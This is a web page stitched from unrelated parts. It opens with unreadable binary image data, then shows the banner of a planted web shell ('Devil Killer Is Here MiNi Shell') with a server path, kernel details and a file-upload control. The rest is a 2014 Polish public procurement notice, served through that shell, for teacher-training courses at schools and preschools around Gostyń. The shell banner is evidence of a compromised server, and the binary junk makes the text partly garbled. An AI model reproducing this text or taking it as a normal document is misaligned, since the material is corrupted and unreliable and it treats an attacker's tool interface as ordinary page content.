JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141007/211379-N-2014.html

<p class="kh_header"><b>Gostyń: Realizacja form doskonalenia nauczycieli  w ramach projektu: Doskonalenie nauczycieli w powiecie gostyńskim.</b><br>
<b>Numer ogłoszenia: 211379 - 2014; data zamieszczenia: 07.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Poznańska 200, 63-800 Gostyń, woj. wielkopolskie, tel. 65 572 06 97, faks 65 572 06 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poradniapp.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja form doskonalenia nauczycieli  w ramach projektu: Doskonalenie nauczycieli w powiecie gostyńskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> LP.	NAZWA/ADRES SZKOŁY/PRZEDSZKOLA
	NAZWA OFERTY DOSKONALENIA	SPOSÓB REALIZACJI OFERTY
1.		Gimnazjum nr 2
 w Gostyniu, 
ul. Hutnika 3, 
63-800 Gostyń	
Techniki uczenia się i metody motywujące do nauki.	Wypracowanie w zespołach nauczycielskich katalogu sposobów motywowania uczniów, właściwego doboru czynników motywujących w zależności od ucznia, sytuacji, kontekstu.
Stosowanie metod aktywizujących, z uwzględnieniem specyfiki zajęć edukacyjnych i zastosowanie metod aktywizujących na konkretnych zajęciach edukacyjnych.

2.		Przedszkole Miejskie 
nr 1 w Gostyniu,
ul. Wrocławska 256,
63-800 Gostyń	
Budowa koncepcji pracy przedszkola.	Umiejętność samodzielnego diagnozowania potrzeb przedszkola oraz tworzenie odpowiadającej na nie koncepcji pracy; narzędzia oraz procedury służące określaniu pożądanych kierunków rozwoju, określenie celów i zadań wychowania przedszkolnego oraz sylwetki absolwenta.  
3.		Przedszkole Miejskie 
nr 4 w Gostyniu,
ul. Starogostyńska 9,
 63-800 Gostyń	
Projekt edukacyjny 
w przedszkolu.	Prawne i dydaktyczne uwarunkowania prowadzenia przedszkolnych projektów edukacyjnych. Tworzenie programów i realizacja przedszkolnych projektów edukacyjnych.
4.		Liceum Ogólnokształcące  w ZSR
w Grabonogu,
Grabonóg 63,
63-820 Piaski	
Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny Internet.	1.Prezi - wykorzystywanie narzędzi graficznych w edukacji, opracowywanie materiałów graficznych z wykorzystaniem  oprogramowania tworzenia i przedstawiania prezentacji na tzw. wirtualnym płótnie, przygotowywanie prezitacji. 
2.Wykorzystywanie Excela w edukacji, opracowywanie dokumentów wykorzystywanych w szkole (rozkłady materiału, kalkulacja i rozliczanie wycieczek i imprez klasowych, opracowywanie wyników egzaminów), arkusz kalkulacyjny na wybranych lekcjach.
5.		Technikum w ZSR w Grabonogu,
Grabonóg 63
63-820 Piaski	
 Nauczyciel 45+	1.Warsztaty tematyczne kształcące umiejętności posługiwania się nowoczesnymi technologiami:
- wykorzystywanie Excela w edukacji: opracowywanie dokumentów wykorzystywanych w szkole (np. rozkłady materiału,  kalkulacja i rozliczanie wycieczek i imprez klasowych, opracowywanie wyników egzaminów), arkusz kalkulacyjny na wybranych lekcjach ,
- wykorzystywanie i obsługa tablic interaktywnych.
2.Warsztaty i/lub treningi realizujące program wzmocnienia sił psychicznych i odporności na stres, profilaktykę wypalenia zawodowego oraz radzenia sobie z jego objawami.
6.		Liceum Ogólnokształcące 
z Oddziałami Dwujęzycznymi w Gostyniu,
ul. Wrocławska 10
63-800 Gostyń	Nauczyciel 45+	Warsztaty i/lub treningi realizujące program wzmocnienia sił psychicznych i odporności na stres, profilaktykę wypalenia zawodowego oraz radzenia sobie z jego objawami.
7.		Zasadnicza Szkoła Zawodowa ZSOiZ w Krobi
ul. Ogród Ludowy 1
63-840 Krobia	Techniki uczenia się i metody motywujące do nauki.	Motywowanie uczniów do pracy oraz poszerzanie kompetencji w obszarze stosowania metod aktywizujących, uwzględniających specyfikę zajęć. Techniki uczenia się, pomoc rodzicom w wspieraniu i motywowaniu dziecka do nauki.

8.		Technikum w ZSOiZ w Krobi
ul. Ogród Ludowy 1
63-840 Krobia	
Wspieranie pracy wychowawców klas - bezpieczna szkoła.	Doskonalenie umiejętności pracy  w zespołach wychowawczych z wykorzystaniem metody warsztatowej oraz metody analizy indywidualnych przypadków. 
Wspólne wypracowanie narzędzi potrzebnych do pracy wychowawczej: ankiet, kwestionariuszy wywiadów/rozmów z uczniami, zbiorów zasad, przykładowych kontraktów itp. 
Szkolenia, warsztaty i konsultacje dla nauczycieli związane z metodami pracy z grupą klasową. 

9	Szkoła Podstawowa 
w Borku Wlkp.
ul. Szkolna 1
63-810 Borek Wlkp.	
Praca z uczniem o specjalnych potrzebach edukacyjnych.	Praca z uczniem o specjalnych potrzebach edukacyjnych, w tym praca z uczniem zdolnym.
Warsztaty i materiały szkoleniowe na temat prowadzenia zajęć z dziećmi.
Warsztaty na temat opinii i orzeczeń z PPP (analiza orzeczenia, wielospecjalistyczna ocena poziomu funkcjonowania ucznia, sformułowanie potrzeb ucznia, określenie form, sposobów i metod pracy z uczniem, opracowanie harmonogramu). 
Warsztaty dla nauczycieli- obserwacja zajęć w praktyce.
Tworzenie narzędzi diagnostycznych do diagnozowania ucznia o specjalnych potrzebach edukacyjnych.
10.	Szkoła Podstawowa 
w Bodzewie
Bodzewo 35
63-820 Piaski	 
Praca z uczniem o specjalnych potrzebach edukacyjnych	Jak pomóc dziecku z upośledzeniem umysłowym w stopniu lekkim funkcjonującym w klasie ?
Pomoc w opanowaniu podstawy programowej przez uczniów bardzo słabych, z dolnej granicy upośledzenia umysłowego, którzy mimo chęci nie są w stanie opanować treści podstawy programowej.
Praca z uczniami, którzy nie wykazują chęci do nauki, mają problem z zapamiętywaniem prostych wiadomości, mimo atrakcyjnych form zajęć, nie przejawiają zainteresowań.
Funkcjonowanie społeczne ucznia z upośledzeniem umysłowym w stopniu lekkim w szkole.
Praktyczne przykłady prowadzenia lekcji z klasą , w której są uczniowie z upośledzeniem umysłowym oraz uczniowie osiągający dobre wyniki w nauce.
11.	Gimnazjum w Bodzewie
Bodzewo 35
63-820 Piaski	
Wykorzystanie TIK na zajęciach edukacyjnych-bezpieczny Internet	Wykorzystanie do konkretnych lekcji tablicy interaktywnej. Przykłady dla lekcji j. polskiego, historii, matematyki, biologii, geografii. (bez zajęć z obsługi narzędzi tablicy).
Wykorzystanie tabletów i dostępnego darmowego oprogramowania podczas lekcji.
Wykorzystanie aplikacji Google (np. Earth) podczas konkretnej lekcji dla różnych przedmiotów.
Wykorzystanie platformy edukacyjnej do TIK.
12.	Szkoła Podstawowa w Zimnowodzie 
Zimnowoda 7
63-810 Borek Wlkp.
	
Jak pomóc uczniowi osiągnąć sukces edukacyjny.	Di  Diagnozowanie mocnych i słabych stron uczniów.
P   Praca z dzieckiem o specjalnych potrzebach edukacyjnych.
W  Warsztaty na temat motywowania uczniów do nauki.
S   Sposoby uatrakcyjniania zajęć.
13.	Gimnazjum 
w Zimnowodzie
Zimnowoda 7
63-810 Borek Wlkp.	
Współpraca szkoły ze środowiskiem lokalnym.	Warsztaty w celu wypracowania przez 
poszczególne grupy map zasobów
 środowiska lokalnego. Zintegrowanie 
powstałych katalogów.
Wypracowanie programu (inicjatyw, form, 
zasad i obszarów) współpracy z lokalnym 
środowiskiem, który stanie się elementem
 koncepcji pracy szkoły (w zależności 
od potrzeb: konsultacje grupowe, 
szkolenie, warsztaty, prezentacja dobrych
 praktyk). 
Warsztaty tematyczne dla nauczycieli w 
zakresie komunikacji interpersonalnej, 
prowadzenia spotkań z rodzicami, 
radzenia sobie w sytuacjach stresowych, 
asertywności. 
14.	Przedszkole Samorządowe 
w Karolewie
Karolew 4
63-810 Borek Wlkp.	
Budowa koncepcji pracy Przedszkola.	Warsztaty dla przedstawicieli społeczności przedszkola służące określeniu głównych zagadnień wymagających uwzględnienia w koncepcji pracy przedszkola :
1)	Ustalenie Misji i Wizji PS Karolew
2)	Ustalenie  priorytetów zmian.
3)	Ustalenie celów ogólnych przedszkola.
Doradztwo w przygotowaniu planu działań, w dokonaniu podziału zadań pomiędzy poszczególnymi pracownikami i organami przedszkola, w wyłonieniu zespołu zadaniowego i zaplanowaniu dalszych kroków.

15.	Szkoła Podstawowa 
w Krobi
ul. Zwierzyckiego 1
63-840 Krobia	
Praca z uczniem o specjalnych potrzebach edukacyjnych.	
Szkolenie dla nauczycieli na temat zasad pracy z uczniami o specjalnych potrzebach edukacyjnych, w tym: zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia, metodologia. 
Warsztaty dla nauczycieli - tworzenie IPET (analiza orzeczenia, wielospecjalistyczna ocena poziomu funkcjonowania ucznia, sformułowanie potrzeb ucznia, określenie form, sposobów i metod pracy z uczniem, opracowanie harmonogramu). 
Praca z zespołem nauczycieli i konkretnym uczniem, w tym: opracowanie IPET; wsparcie przy realizacji zaplanowanych działań np. zajęć specjalistycznych, konsultacji dla ucznia i jego rodziców; superwizja. 
Konsultacje i warsztaty dla nauczycieli w zakresie pracy z uczniami o specjalnych potrzebach edukacyjnych. 
16.	Gimnazjum w Krobi
ul. Zwierzyckiego 1
63-840 Krobia
	 
Postawy uczniowskie. Jak je kształtować.	Szkolenia dla grup nauczycieli, oraz Rady Pedagogicznej:
 
- planowanie i wdrażanie pracy wychowawczej 
- monitorowanie i ocena efektywności wdrożonych działań - ewaluacja odroczona. 
- kształcenie/rozwijanie umiejętności komunikacji interpersonalnej 
- ABC wychowawcy/rozwiązywanie konfliktów w szkole 
- nauczyciel wobec trudnych zachowań uczniów 
- współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów 
- udział pracowników poradni psychologiczno-pedagogicznej, rodziców, uczniów oraz przedstawicieli instytucji partnerskich w procesie planowania oraz analizowania programu wychowawczego i działań wychowawczych. 
17.	Szkoła Podstawowa 
Nr 1 w Gostyniu
ul. Helsztyńskiego 8
63-800 Gostyń	
Wykorzystanie TIK na zajęciach edukacyjnych- bezpieczny Internet
	Wykład dla całej Rady Pedagogicznej na temat narzędzi TIK i ich wykorzystania w praktyce szkolnej. Korzystanie z zasobów Internetu (prawa autorskie, rzetelność prezentowanych treści, gradacja informacji).
Warsztaty- praktyczne wykorzystanie tablicy multimedialnej na zajęciach edukacyjnych na różnych poziomach kształcenia.
Warsztaty kształcące/ćwiczące umiejętności praktyczne związane z włączaniem narzędzi informatycznych do przygotowania i prowadzenia zajęć oraz szeroko pojętej pracy dydaktycznej.

18.	Szkoła Podstawowa
 Nr 5 w Gostyniu
ul. Graniczna 1
63-800 Gostyń	
Jak i po co prowadzić ewaluację wewnętrzną?
	Szkolenie na temat ewaluacji wewnętrznej jako sposobu badania pracy szkoły. Metodologia badań.
Warsztat poświęcony wspólnej analizie wymagań i charakterystyk opisanych w załączniku do Rozporządzenia Ministra Edukacji Narodowej z dnia 10 maja 2013r. w sprawie nadzoru pedagogicznego (D.U. z 2013r. poz. 560)
Warsztaty z zakresu tworzenia projektu ewaluacyjnego.
Warsztat na temat kształcenia umiejętności planowania działań na podstawie wniosków z ewaluacji wewnętrznej i zebranych opinii. 

19.	Szkoła Podstawowa 
w Sikorzynie
Sikorzyn 16b
63-800 Gostyń	
Uczeń- aktywny uczestnik procesu uczenia się.

	Metody pracy z uczniem przejawiającym trudności i posiadającym niską motywację.
Diagnoza oraz poznawanie sposobów i rozwiązań umożliwiających nauczanie dzieci funkcjonujących na różnych poziomach.
Budowanie systemu działań nauczycieli, aby uczniowie mieli wpływ na sposób organizowania i przebiegu procesu uczenia się oraz czuli się odpowiedzialni za własny rozwój.

20.	Szkoła Podstawowa 
w Kunowie
ul. Szkolna 5
63-800 Gostyń	
Techniki uczenia się i metody motywujące do nauki
	 Metody klasyczne a metody angażujące uczniów - rola nauczyciela,
- sposoby uczenia się w oparciu o teorię Inteligencji Wielorakiej Howarda Gardnera,
- metody angażujące uczniów na dobre rozpoczęcie lekcji, na dalszą część, na podsumowanie; metody nauczania kooperatywnego, 
- style uczenia się- ćwiczenia umożliwiające rozpoznanie poszczególnych dominujących kanałów sensorycznych,
- zasada działania i struktura pamięci- sposoby zapamiętywania przyswojonego materiału,
- techniki i metody twórczego myślenia,
- analiza przypadków.

21.	Szkoła Podstawowa 
w Daleszynie
Daleszyn 76
63-800 Gostyń	
Jak pomóc uczniowi osiągnąć sukces edukacyjny?
	Warsztaty dl nauczycieli dotyczące:
- diagnozowania mocnych i słabych stron dziecka, pracy z dzieckiem zdolnym i słabym; rozpoznawanie uzdolnień, wspieranie ucznia,
- twórczego myślenia (na przykładzie konkretnych typów zadań egzaminacyjnych); diagnozowanie umiejętności matematycznych i językowych,
- pracy z uczniem młodszym,
- analizy treści podstawy programowej oraz sposobu realizowania jej na poszczególnych poziomach kształcenia- korelacja podstawy programowej przedszkolnej z wczesnoszkolną,
- sposoby ewaluacji realizowanych działań. 

22.	Szkoła Podstawowa 
w Siemowie
Siemowo 102
63-800 Gostyń	
Współpraca nauczycieli w prowadzeniu procesów edukacyjnych
	Szkolenie z zakresu podstaw efektywnej komunikacji, udzielania konstruktywnej informacji zwrotnej oraz pracy zespołowej.
Warsztaty związane z tematyką badań preferencji uczenia się  uczniów oraz wspólna praca nad opracowaniem wniosków wynikających z badań nad preferencjami uczenia się konkretnych uczniów.
Szkolenie z zakresu celowego wykorzystania różnych metod pracy z uczniami.

23.	Szkoła Podstawowa 
w Goli
Gola 17
63-800 Gostyń	
Nauczyciel 45+
	Warsztaty/treningi realizujące program wzmocnienia sił psychicznych i odporności na stres, profilaktykę wypalenia zawodowego oraz radzenia sobie z jego objawami. 
Spotkania informacyjno- szkoleniowe ze specjalistami w dziedzinie profilaktyki chorób zawodowych nauczyciela.
Spotkanie informacyjne ze specjalistą na temat aktualnych przepisów emerytalnych.
Konsultacje indywidualne i grupowe dla nauczycieli.

24.	Technikum w ZSZ 
w Gostyniu
ul. Tuwima 44
63-800 Gostyń	
Wykorzystanie TIK na zajęciach edukacyjnych
	Office 365 - wstęp
- wprowadzenie do portalu Office 365
- logowanie do portalu Office 365
Poczta, kalendarz i przepływ informacji
- interfejs Outlook Web App
- dodawanie i konfigurowanie kont
- tworzenie pojedynczych kontaktów i grup kontaktów
- wysyłanie i odbieranie wiadomości
- ustawienie widoku konwersacji
- ustawienie stopki i automatycznej odpowiedzi
- kategoryzowanie informacji w Outlook Web App
- foldery osobiste; reguły wiadomości
- praca z kalendarzem
- tworzenie i przeglądanie istniejących zadań
- udostępnianie kalendarza innym użytkownikom
- tworzenie, edycja i usuwanie plików Word, Excel, PowerPoint i OneNote
- tworzenie ankiet, testów i formularzy
- udostępnianie zasobów w usłudze OneDrive
- tworzenie wiadomości błyskawicznych
- elementy pracy grupowej
- konfiguracja klienta poczty Microsoft Outlook do pracy z Office 365
- prowadzenie własnej witryny

25.	Szkoła Podstawowa 
w Piaskach
ul. Drzęczewska 9
63-820 Piaski	
Rodzice są partnerami szkoły	 Warsztaty tematyczne dla nauczycieli w 
 zakresie komunikacji interpersonalnej.
 Prowadzenie spotkań z rodzicami.
 Radzenie sobie w sytuacjach stresowych, asertywność.
 Opracowanie listy form działań integracyjnych i pretekstów wizyt rodziców  w szkole,   zaplanowanie i realizacja wybranych form.  



26.	Gimnazjum w Piaskach
ul. Drzęczewska 9
63-820 Piaski	 
Wykorzystanie TIK na zajęciach edukacyjnych- bezpieczny Internet.
Wykorzystanie TIK na zajęciach edukacyjnych -tablica interaktywna, platformy edukacyjne. Wykorzystanie do konkretnych lekcji tablicy interaktywnej. Przykłady dla lekcji matematyki, biologii, geografii, fizyki, chemii. /bez zajęć z obsługi narzędzi tablicy/. 
Platformy edukacyjne: scholaris, eduscience
Korelacja międzyprzedmiotowa np.: informatyka- matematyka, informatyka- biologia, itp.

27.	Szkoła Podstawowa 
w Szelejewie
Szelejewo Pierwsze 87
63-820 Piaski	
Wykorzystanie TIK na zajęciach edukacyjnych- bezpieczny Internet.
Wykorzystanie TIK na zajęciach edukacyjnych.
Zastosowanie tablicy interaktywnej do wybranych lekcji w klasach edukacji wczesnoszkolnej i w klasach IV-VI SP /przykłady lekcji/.
Platformy edukacyjne: scholaris, eduscience,
Wykorzystanie pracowni komputerowej przez nauczycieli Szkoły Podstawowej /przykłady lekcji/.


28.	Gimnazjum 
w Szelejewie
Szelejewo Pierwsze 87
63-820 Piaski	
Postawy uczniowskie. Jak je kształtować?.	
Jak radzić sobie z uczniem agresywnym podczas lekcji i przerw w szkole  szkole? Przykłady pracy i metody dostosowane do problemów szkoły.
Nadpobudliwość emocjonalna, psychoruchowa- metody dyscyplinowania.
ADHD.
 

 
29.	Szkoła Podstawowa 
w Starej Krobi
Stara Krobia 71
63-840 Krobia	
Praca z uczniem o specjalnych potrzebach edukacyjnych.
Pomoc w opanowaniu podstawy programowej przez uczniów bardzo  słabych, z dolnej granicy upośledzenia umysłowego, którzy mimo chęci nie są w stanie opanować treści podstawy 
programowej.
Praca z uczniami, którzy nie wykazują chęci do nauki, mają problem z zapamiętaniem prostych wiadomości, mimo atrakcyjnych form zajęć nie przejawiają zainteresowań.
Funkcjonowanie społeczne ucznia z upośledzeniem umysłowym w stopniu lekkim w szkole.
Praktyczne przykłady prowadzenia lekcji z klasą, w której są uczniowie z upośledzeniem umysłowym w stopniu lekkim oraz uczniowie osiągający dobre wyniki w nauce.
  

30.	Gimnazjum w Starej Krobi
Stara Krobia 71
63-840 Krobia	
Uczeń aktywny uczestnik procesu uczenia się. Organizacja przestrzeni w sali lekcyjnej. Dobór i wykorzystanie metod pracy sprzyjających uczeniu się. 
Uczestnictwo uczniów w planowaniu, organizowaniu i realizacji procesów edukacyjnych prowadzonych w szkole,
Budowanie świadomości rodziców za współodpowiedzialność procesu uczenia się dziecka.
Doradztwo zawodowe nauczyciela dla ucznia i dla jego rodziców. Kształtowanie świadomość rodzica w zakresie przekazywania informacji o dalszej drodze kształcenia jego dzieci.



31.	Gimnazjum w Borku Wlkp.
ul. Dworcowa 58
63-810 Borek Wlkp.	 
Jak pomóc uczniowi osiągnąć sukces edukacyjny?	
Rozpoznawanie uzdolnień, wspieranie ucznia. 
Diagnozowanie mocnych i słabych stron  dziecka, praca z uczniem ze specjalnymi  potrzebami edukacyjnymi, w tym z uczniem zdolnym.
Motywowanie uczniów, różne style uczenia się, wzbogacanie warsztatu metodycznego.
Nabywanie umiejętności budowania wspólnej strategii pracy nauczyciela i ucznia na rzecz wspierania rozwoju dziecka.
Informacje na temat materiałów edukacyjnych, innowacji, literatury dla nauczycieli i rodziców.

32.	Przedszkole Miejskie 
Nr 5 w Gostyniu
ul. Mostowa 8
63-800 Gostyń	
Jak i po co prowadzić ewaluację wewnętrzną w przedszkolu?	
Nabycie/zweryfikowanie przez nauczycieli wiedzy na temat ewaluacji, form w jakich realizowana jest w edukacji (ewaluacja wewnętrzna i zewnętrzna) oraz jej funkcji  w procesie rozwoju przedszkola.
Wspólna analiza wymagań stawianych przedszkolom przez państwo zawartych w dokumentach MEN.
Poznanie przez nauczycieli metod, narzędzi i procedur przydatnych w tworzeniu projektu ewaluacyjnego. 
Pomoc w zbudowaniu projektu ewaluacyjnego.   
Ćwiczenie umiejętności przeprowadzania ewaluacji wewnętrznej w przedszkolu.  
Zbudowanie struktury wspierającej efektywne wykorzystanie wniosków z ewaluacji wewnętrznej do doskonalenia  jakości pracy  przedszkola..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie, że spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie, że spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie, że spełnia przedmiotowy warunek</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie, że spełnia przedmiotowy warunek oraz wykaże, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają minimum łącznie:
a)	wykształcenie wyższe II stopnia, 
b)	posiada doświadczenie w szkoleniu osób dorosłych, nie mniej niż 100 godzin, w tym nauczycieli,
c)	doświadczenie w realizacji minimum jednej formy doskonalenia nauczycieli, o których mowa w rozdziale III, ust. 4 SIWZ lub zbliżonej merytorycznie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony, jeżeli wykonawca złoży oświadczenie, że spełnia przedmiotowy warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
